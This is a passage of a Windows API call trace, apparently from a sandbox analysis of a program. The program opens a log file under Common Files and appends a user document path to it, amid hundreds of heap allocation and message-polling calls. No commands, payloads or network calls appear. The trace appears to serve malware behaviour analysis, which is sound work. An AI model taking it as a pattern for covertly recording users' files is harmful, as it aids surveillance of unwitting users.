lpMsg=0x87f194) returned 0 [0175.247] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0175.248] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.248] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0175.248] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.248] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0175.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0175.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.249] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0175.250] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x13f8, lpOverlapped=0x0) returned 1 [0175.250] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0175.250] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x13f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.250] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0175.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0175.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.flyingship.ico\r\n", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0175.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53) returned 0x8c4a48 [0175.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.flyingship.ico\r\n", cchWideChar=83, lpMultiByteStr=0x8c4a48, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.flyingship.ico\r\n", lpUsedDefaultChar=0x0) returned 83 [0175.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0175.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0175.251] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x52, lpOverlapped=0x0) returned 1 [0175.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0175.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.251] CloseHandle (hObject=0x120) returned 1 [0175.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0175.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0175.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0175.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0175.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0175.254] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0175.254] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0175.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0175.256] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0175.256] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.256] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0175.256] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0175.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0175.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0175.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0175.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0175.257] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0175.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0175.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0175.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0175.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0175.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0175.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0175.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0175.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0175.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0175.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0175.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0175.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0175.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0175.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0175.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0175.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.260] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 